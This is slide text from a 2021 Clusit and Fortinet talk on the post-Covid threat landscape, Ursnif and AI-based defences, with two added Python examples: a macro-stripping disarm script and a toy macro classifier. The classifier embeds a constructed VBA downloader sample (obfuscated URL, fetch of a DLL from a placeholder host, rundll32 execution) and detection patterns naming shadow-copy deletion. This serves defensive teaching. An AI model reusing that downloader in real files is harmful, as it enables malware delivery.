Session: Digitalization (forced?), Covid and new communication technologies: how they have changed the threat landscape and what needs to be done to face the new normal
Luca Bechelli, Steering Committee, Clusit
Federico Saraò, System Engineer, Fortinet
16 March 2021, 15:20-16:20 - StreamingEdition #securitysummit #streamingedition
What is happening? Types and distribution of attackers, 2020 (pie chart): Cybercrime 81%, Espionage / Sabotage 14%; Hacktivism and Information warfare share the remaining 5% (3% and 2%). (© Clusit - Rapporto 2021 sulla Sicurezza ICT in Italia)
What is happening? Types and distribution of attack techniques, 2020 (pie chart): Malware 42%, Unknown 20%, Phishing / Social Engineering 15%, Vulnerabilities 10%, Multiple Threats / APT 5%, Account Cracking 5%, DDoS 2%, 0-day 1%. (© Clusit - Rapporto 2021 sulla Sicurezza ICT in Italia)
Same attack-technique chart, annotated with a +44% year-over-year increase.
What is happening? Types and distribution of victims, 2020 (pie chart): Multiple targets 20%, Gov - Mil - LE - Intelligence 14%, Health 12%, Research - Education 11%, Online Services / Cloud 10%; the remaining categories (Others, SW / HW Vendor, Banking / Finance, Critical Infrastructures, Entertainment / News, GDO / Retail, Organization - ONG, Telco, Hospitability, Gov. Contractors / Consulting, Security) account for the rest, each in the single digits. (© Clusit - Rapporto 2021 sulla Sicurezza ICT in Italia)
Same attack-technique chart, annotated: Malware, +50% of infected PCs.
What is happening? Malware types, 2020 (pie chart): Ransomware 67%; the remaining third is split among RAT, Others, Magecart, Crypto*, Backdoor, POS, Botnet and spyware (shares from 9% down to 1%). (© Clusit - Rapporto 2021 sulla Sicurezza ICT in Italia)
Do cybercriminals not wish you that much harm after all? Severity distribution per attacker type, 2020 (stacked bar chart, 0-100%: Cybercrime, Espionage / Sabotage, Hacktivism, Information warfare; severity levels Critical, High, Medium; per-bar values not recoverable from the extracted slide). (© Clusit - Rapporto 2021 sulla Sicurezza ICT in Italia)
Covid-19 scenario (Clusit, 2020 data):
- 10% of the attacks recorded in 2020 were Covid-19 themed
- 70% of those attacks have a Cybercrime motivation
- 55% fall into the "Multiple Targets" category
- 55% have the lowest severity
What about advanced attacks? Same attack-technique chart, annotated with a +46% increase.
Advanced Threats Continue to Adapt (FortiGuard timeline; © Fortinet Inc. All Rights Reserved.)
Significant threat incidents by period: 1990–1999 Melissa; 2000–2001 Code Red; 2002–2003 Slammer; 2004–2005 Sasser; 2006–2007 Zeus; 2008–2009 Conficker; 2010–2011 Stuxnet; 2012–2014 Cryptolocker; 2015–2017 Wannacry; 2018–2019 VPNFilter; 2020+ Swarmbot.
Chart series: Cumulative Records Stolen and Annual # of Ransomware Attacks (per-period values not recoverable from the extracted slide). Average cost of a data breach is $3.92 million.
Cyber Threat Predictions for 2021 (by FortiGuard Labs): the Intelligent Edge is a target
- LANs, WANs, multi-cloud, data center, remote office, IoT, mobile devices, and more, each with its own risks and vulnerabilities
- Trojans evolve to target the edge(s)
- Advancements in social engineering attacks
- 5G and swarm-based attacks
- Evolution of ransomware
Trojans Evolve to Target the Edge(s)
- Edge Access Trojans (EATs) sniff data on edge devices to improve the effectiveness of attacks
- Intercept local network voice requests
- Can compromise systems or inject commands
- Cross-platform capabilities increase risk
- Open-source toolkits and compromised devices offered as a service
Advancements in Social Engineering Attacks
- Smart devices move from target to conduit
- Targeting home smart systems that tie multiple devices and systems together
- Discover daily routines, habits, or personal information to increase the effectiveness of lures
- Disable security systems and cameras, or hijack smart appliances
5G Can Enable Swarm-based Attacks
- Weaponizing 5G and edge computing
- Leverage thousands of hijacked devices, divided into subgroups, each with specialized skills
- Attack targets as an integrated system, sharing intelligence in real time
- Require large amounts of processing power
- Defensive AI will need to evolve to the next generation
New Ways to Leverage Ransomware in Critical Infrastructure
- The most dangerous/damaging threat organizations face
- Negotiating and data exfiltration
- Convergence of technologies (OT) creates more points of failure
- More data, more devices, more risk, even to people
- Attackers must leverage and exploit edge and other systems
Cyber Threat Predictions for 2021: Targeting Computing Performance Innovations
- Developments in computing performance and innovation in connectivity
- Advances in cryptomining
- Spreading attacks from space
- Quantum computing threat
Advances in Cryptomining
- Compromising edge devices for their processing power
- ML and AI capabilities require processing power to process massive amounts of data
- Attackers learn how and when edge devices are used, making cryptomining much more effective
- Infected PCs show CPU drain; compromising secondary devices is less noticeable
- An edge computing security strategy is needed today
Spreading Attacks from Space
- Data and internet links provided through advanced satellite-based systems are growing
- Target satellite base stations
- Spread malware through satellite-based systems, potentially targeting millions of connected users at scale
- DDoS attacks could impede vital communications
- OT will most likely be affected first
Quantum Computing Threat
- Quantum computers are not simply faster machines: a sufficiently large one can run algorithms (Shor's) that break today's asymmetric schemes such as RSA and elliptic-curve cryptography
- Mostly nation-states have them
- Hard-coded cryptographic primitives cannot be swapped out when that happens, so they offer neither protection nor efficiency
- NIST: maintaining crypto-agility is imperative
- Adopt quantum-resistant algorithms before quantum computers become generally available
Banking trojan Ursnif/Gozi is targeting Italy again. What is Ursnif (also known as Gozi)?
- Gozi is one of the most widespread banking Trojans.
- It started operating back in 2007, and thanks to its countless variants it is still a serious danger to millions of users.
- The Ursnif Trojan has been observed targeting Italy over the past year, and in recent months FortiGuard Labs detected a phishing campaign in the wild spreading a fresh variant of Ursnif via an attached MS Word document.
New Variant of Ursnif Targeting Italy: Fortinet Solution Coverage
- The Word document attached to the phishing email is detected as "VBA/Ursinf.3412!tr" and the downloaded file as "W32/Ursinf.KB!tr" by the FortiGuard AntiVirus service.
- The URL used to download Ursnif (a DLL file) is rated as "Malicious Websites" by the FortiGuard WebFilter service.
- The Content Disarm & Reconstruction (CDR) feature can also neutralize this threat by stripping the macro code from the document before delivery.
- The FortiGuard AntiVirus service is supported by FortiGate, FortiMail, FortiClient and FortiEDR; the CDR feature is supported by FortiGate and FortiMail.
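As an added example (not Fortinet's CDR implementation, and not code from this deck), the following Python script shows the core of what a CDR step does to a macro-enabled Word document: it rebuilds the OOXML package without the VBA parts, drops the relationship that points Word at them, and rewrites the content type from macroEnabled to a plain document. The .docm-like archive it operates on is constructed inline, with placeholder bytes standing in for the OLE vbaProject.bin; the function names, part names and regexes are this example's own.

```python
import io
import re
import zipfile

# Constructed minimal .docm-like package (hypothetical sample, not a real document).
CONTENT_TYPES = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
    '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
    '<Default Extension="xml" ContentType="application/xml"/>'
    '<Default Extension="bin" ContentType="application/vnd.ms-office.vbaProject"/>'
    '<Override PartName="/word/document.xml" '
    'ContentType="application/vnd.ms-word.document.macroEnabled.main+xml"/>'
    '</Types>'
)
DOCUMENT_RELS = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    '<Relationship Id="rId1" Type="http://schemas.microsoft.com/office/2006/relationships/vbaProject" Target="vbaProject.bin"/>'
    '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>'
    '</Relationships>'
)
DOCUMENT_XML = (
    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
    '<w:body><w:p><w:r><w:t>Fattura n. 1234</w:t></w:r></w:p></w:body></w:document>'
)


def build_sample_docm() -> bytes:
    """Assemble the constructed macro-enabled package in memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", CONTENT_TYPES)
        z.writestr("word/_rels/document.xml.rels", DOCUMENT_RELS)
        z.writestr("word/document.xml", DOCUMENT_XML)
        z.writestr("word/styles.xml", "<w:styles/>")
        # Placeholder standing in for the OLE container that holds the VBA project.
        z.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"AutoOpen Shell ...")
    return buf.getvalue()


# Parts that carry VBA code/metadata, the relationships that reference them,
# and the content-type entries that mark the package as macro-enabled.
MACRO_PART = re.compile(r"(^|/)(vbaProject\.bin|vbaData\.xml|vbaProjectSignature\.bin)$", re.I)
MACRO_REL = re.compile(
    r'<Relationship\b[^>]*\bType="[^"]*/relationships/vba(Project|Data|ProjectSignature)"[^>]*/>', re.I
)
MACRO_CT = re.compile(r"application/vnd\.ms-word\.(document|template)\.macroEnabled\.main\+xml")
MACRO_DEFAULT = re.compile(r'<Default Extension="bin" ContentType="application/vnd\.ms-office\.vbaProject"/>')


def disarm_docm(data: bytes):
    """Rebuild the package without VBA parts; return (clean_bytes, removed_part_names)."""
    removed = []
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(data)) as src, zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            name = info.filename
            if MACRO_PART.search(name):
                removed.append(name)  # the macro container is not copied at all
                continue
            payload = src.read(name)
            if name == "[Content_Types].xml":
                txt = payload.decode("utf-8")
                # macroEnabled main part -> plain document/template main part
                txt = MACRO_CT.sub(r"application/vnd.openxmlformats-officedocument.wordprocessingml.\1.main+xml", txt)
                txt = MACRO_DEFAULT.sub("", txt)
                payload = txt.encode("utf-8")
            elif name.endswith(".rels"):
                # drop the relationship that pointed Word at the VBA project
                payload = MACRO_REL.sub("", payload.decode("utf-8")).encode("utf-8")
            dst.writestr(name, payload)
    return out.getvalue(), removed


def has_macros(data: bytes) -> bool:
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        return any(MACRO_PART.search(n) for n in z.namelist())


def read_part(data: bytes, name: str) -> str:
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        return z.read(name).decode("utf-8")


if __name__ == "__main__":
    sample = build_sample_docm()
    clean, dropped = disarm_docm(sample)
    print("macros before:", has_macros(sample), "after:", has_macros(clean), "dropped:", dropped)
```

The document text survives untouched while the only part that can execute is gone, which is the point of CDR as opposed to detection: no signature for the specific Ursnif variant is needed. A production CDR engine additionally handles OLE2 (.doc) files, embedded objects, DDE fields and Excel 4.0 macro sheets, none of which this example covers.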
Artificial Intelligence Will Be Key: technology, people, training, and partnerships are needed to defend
- AI technology needs to keep up, and will need to evolve to the next generation
- Organizations can't do it alone; they need to leverage outside groups/partners
AI Technology Needs to Keep Up
- Evolution of AI is critical for future defense against evolving attacks
- Federated machine learning: local learning nodes able to detect, analyze and take action, sharing information with other local nodes instead of with a centralized server
- Playbooks can be fed to AI systems to enable the detection of attack patterns
- Defenders will be able to see, anticipate, and counter attacks
- Attacks will take milliseconds
Organizations Can't Do It Alone
- Proactive defense requires effective incident response: know what to do next to stop the attack in its tracks
- Threat-intelligence feeds, relevant consortiums, and proactive sharing
- Intelligent systems can be used to obfuscate network targets, insert honeypots along attack paths, and use the collected data to better train AI systems
Only by working together will we turn the tide against cybercriminals.
Fortinet AI-based Solutions Milestones
- 2011: Fortinet was an early adopter of Machine Learning.
- 2012: FortiGuard Labs develops Self Evolving Detection Systems (SEDS) based on an Artificial Neural Network (ANN) to generate and distribute malware signatures.
- 2018: AI integrated in-line in the FortiWeb WAF.
- 2019: AI integrated in FortiSandbox, FortiInsight and FortiEDR.
- 2020: First to offer Virtual Security Analyst™ based on Deep Neural Networks (DNN), "SEDS v2", with FortiAI.
Timeline (2011, 2012, 2016, 2018, 2019, 2020): Domain/URL Research develops SEDS to study malware; FortiGuard Services deploys SEDS antimalware; FortiWeb AI-based web application protection; FortiInsight AI-based UEBA; FortiSandbox AI-based sandboxing; FortiEDR AI-based EDR; FortiAI Virtual Security Analyst™ based on DNN analysis.
AI-driven Security Operations: global ingestion, analytics and machine learning, 10B+ events analyzed every day
- Sources: Firewalls, Web, Emails, Endpoints, Sandbox, Deception, EDR, UEBA, WAF
- Analytics: Global Threat Intelligence, Custom Machine Learning, Virtual Analyst
- Orchestration: SIEM, SOAR, Fabric Analytics
- AI-powered Response
Customer-deployed ML Across the Cyber Kill Chain: Reconnaissance, Weaponization, Delivery, Exploitation, Installation, Command & Control, Act on Objectives. Products placed along the chain: FortiWeb, FortiEDR, FortiInsight, FortiSandbox, FortiAI, FortiMail, FortiGate, FortiDeceptor (the per-stage mapping is not recoverable from the extracted slide).
Q&A. Come visit us at our virtual desk!
FortiGuard Neural Network: Fortinet SEDS (Self-Evolving Defense System)
1. Input layer: submit files for analysis
2. Hidden layers (one or more): computation
   - Malicious hidden layer scans 2.3 billion nodes analyzing for potential malicious features
   - Clean hidden layer scans 3.2 billion nodes analyzing for clean features
3. Output layer: result of the analysis, clean or dirty
   - The output is the result of 2.3B x 3.2B individual node computations
   - Current feature set: 8.5 billion code blocks
MLP behavior is similar to human neurons: if the input is strong enough, the signal is passed on according to its weighted value. Single node: feature inputs f1..fn (extracted from raw samples) are multiplied by weights w1..wn, summed, and passed through an activation function, Func(f1*w1 + f2*w2 + ... + fn*wn), which yields a YES/NO decision: MALICIOUS or CLEAN.
FortiAI: Virtual Security Analyst™, a malware analyst that identifies 20+ attack scenarios and finds "Patient Zero"
Questions it answers:
- What type of malware attacks am I under?
- How was the malware spread through the network?
- What is the intent of the malware?
- Why is it malicious?
- Sub-second verdict
Attack scenarios: Downloader, Redirector, Dropper, Ransomware, Worm, Phishing, Password Stealer, RootKit, Banking Trojan, InfoStealer, Exploit, Fileless, Clicker, Virus, Application, CoinMiner, DoS, Wiper, Search Engine Poisoning, SMB Worm Spread, BackDoor, WebShell, Proxy Trojan, Industroyer.
Industry's first on-premise deep learning AI model. Virtual Security Analyst™ powered by Deep Neural Networks that identifies, classifies, and investigates threats, reducing detection time from minutes to a sub-second verdict. Figure shown on the slide: 99.9%.
FortiAI: Malware Detection Workflow
Each node of the neural network represents an "Analyst" whose job is to determine whether the file matches a single malware feature. Single layer of neural network: pre-trained with 20mil+ clean and malicious files (training and updates on a regular basis from FortiGuard Labs); billions of clean and malicious features learnt.
Pipeline:
1. Input layer: files (binaries, scripts).
2. Feature extraction: text parser (scripts), disassembler (PE), de-obfuscate, unpack, via techniques such as analysis of registry values, stack status, execution flow etc. Produces code blocks, on average 3000+ per file.
3. Feature matching against the features DB (6mil+ features, PE (Portable Executable) and non-PE features, GPU/hardware accelerated): match, count, prioritize.
4. Output layer: verdict (Result = Malicious or Clean) with the features detected, e.g. Downloader = 26, Trojan features = 5, Ransomware = 2.
On-prem self-learning: learns from customer traffic with a dedicated Customer Feature DB (updated every time a new feature is identified) complementing the existing FortiAI DB.
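To make the workflow above and the single-node Func(f1*w1 + ... + fn*wn) form of the SEDS slide concrete, here is an added example (illustrative code written for this page, not FortiAI's engine or anything from the deck) that runs a constructed VBA-style downloader macro through the same stages: de-obfuscation, feature extraction by pattern matching against a small hand-written feature DB, counting and prioritizing hits per family, and one weighted node with a step activation that emits the verdict. The sample macro, the feature regexes, the weights and the bias are all assumptions chosen for illustration; a real engine holds millions of features learned from training data rather than a dozen hand-written ones.

```python
import re

# Constructed sample: a VBA-style downloader macro written for this example (not Ursnif's code).
SAMPLE_MACRO = r'''
Sub AutoOpen()
    Dim u As String
    u = Chr(104) & Chr(116) & Chr(116) & Chr(112)   ' URL scheme assembled char by char
    Set x = CreateObject("MSXML2.XMLHTTP")
    x.Open "GET", u & "://example.invalid/a.dll", False
    x.Send
    Set s = CreateObject("ADODB.Stream")
    s.Open
    s.Write x.responseBody
    s.SaveToFile Environ("TEMP") & "\a.dll", 2
    Shell "rundll32 " & Environ("TEMP") & "\a.dll,DllRegisterServer", 0
End Sub
'''

# Constructed benign macro for comparison.
BENIGN_MACRO = r'''
Sub FormatTable()
    ActiveDocument.Tables(1).Style = "Table Grid"
End Sub
'''

# Hypothetical feature DB: (family, feature name, pattern). Illustrative entries only.
FEATURES = [
    ("Downloader", "auto_exec",     r"\bSub\s+(AutoOpen|Document_Open|Workbook_Open)\b"),
    ("Downloader", "http_object",   r'CreateObject\("MSXML2\.XMLHTTP'),
    ("Downloader", "adodb_stream",  r'CreateObject\("ADODB\.Stream"'),
    ("Downloader", "save_to_file",  r"\.SaveToFile\b"),
    ("Downloader", "http_string",   r'"https?"|https?://'),
    ("Downloader", "rundll32_exec", r"\bShell\b.*\brundll32\b"),
    ("Obfuscation", "chr_concat",   r"Chr\(\d+\)\s*&\s*Chr\(\d+\)"),
    ("Obfuscation", "env_temp",     r'Environ\("TEMP"\)'),
    ("Ransomware", "crypto_api",    r"\bCryptEncrypt\b|\bAESManaged\b"),
    ("Ransomware", "shadow_copies", r"vssadmin\s+delete\s+shadows"),
]

# Hypothetical per-feature weights and bias for the single output node.
WEIGHTS = {
    "auto_exec": 0.6, "http_object": 0.8, "adodb_stream": 0.5, "save_to_file": 0.9,
    "http_string": 0.4, "rundll32_exec": 1.0, "chr_concat": 0.7, "env_temp": 0.3,
    "crypto_api": 1.0, "shadow_copies": 1.2,
}
BIAS = -2.0

CHR_RUN = re.compile(r"(?:Chr\(\d+\)\s*&\s*)+Chr\(\d+\)")


def de_obfuscate(text: str) -> str:
    """Fold Chr(n) & Chr(n) & ... runs into the literal string they build."""
    def fold(m):
        codes = re.findall(r"Chr\((\d+)\)", m.group(0))
        return '"' + "".join(chr(int(c)) for c in codes) + '"'
    return CHR_RUN.sub(fold, text)


def extract_features(text: str) -> set:
    """Return the names of every feature whose pattern matches the text (one 'analyst' per feature)."""
    return {name for _, name, pat in FEATURES if re.search(pat, text, re.I | re.M)}


def node_verdict(hits):
    """Single MLP-style node: Func(f1*w1 + ... + fn*wn) with a step activation."""
    total = sum(WEIGHTS.get(f, 0.0) for f in hits) + BIAS
    return ("MALICIOUS" if total > 0 else "CLEAN"), round(total, 2)


def classify(macro_text: str) -> dict:
    # Obfuscation is itself a feature, so match the raw text as well as the de-obfuscated text.
    hits = extract_features(macro_text) | extract_features(de_obfuscate(macro_text))
    families = {}
    for family, name, _ in FEATURES:
        families[family] = families.get(family, 0) + (1 if name in hits else 0)
    top = max(families, key=families.get) if any(families.values()) else None
    verdict, score = node_verdict(hits)
    return {"features": sorted(hits), "families": families, "top_family": top,
            "verdict": verdict, "score": score}


if __name__ == "__main__":
    for label, text in (("sample", SAMPLE_MACRO), ("benign", BENIGN_MACRO)):
        print(label, classify(text))
```

The de-obfuscation step is what makes the http_string feature visible: on the raw text the scheme only exists as a run of Chr() calls, so a matcher that skips that stage under-counts the Downloader family. The per-family counts are what a slide like "Downloader = 26, Trojan = 5, Ransomware = 2" summarizes, and the weighted node is the part a trained network replaces with learned weights instead of the hand-set ones here.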
FortiEDR: Real Time Endpoint Protection, a comprehensive endpoint security platform
FortiEDR is the only endpoint security solution built from the ground up to detect advanced threats and stop breaches and ransomware damage in real time, even on an already compromised device, allowing you to respond to and remediate incidents automatically to protect data, ensure system uptime, and preserve business continuity.
Pre-infection:
- Discover & Predict (proactive risk management): discover rogue devices & IoT, vulnerabilities, virtual patching
- Prevent (pre-execution protection, real-time protection): kernel-level, machine-learning AV, threat classification
Post-infection / post-execution:
- Detect & Defuse (no alert fatigue, no dwell time): behavioral-based detection of file-less and advanced threats, detect memory-based attacks, zero dwell time; stop breach and ransomware: block malicious actions, prevent data loss
- Respond & Remediate (full attack visibility): playbook automation, forensic data, threat hunting, big data analytics
- Customized disinfection (automated): clean up / roll back, eliminate re-image/rebuild, minimize business disruption
Automation | Cloud, hybrid or air-gap deployment (cloud, on-premises or hybrid management) | lightweight agent | OS coverage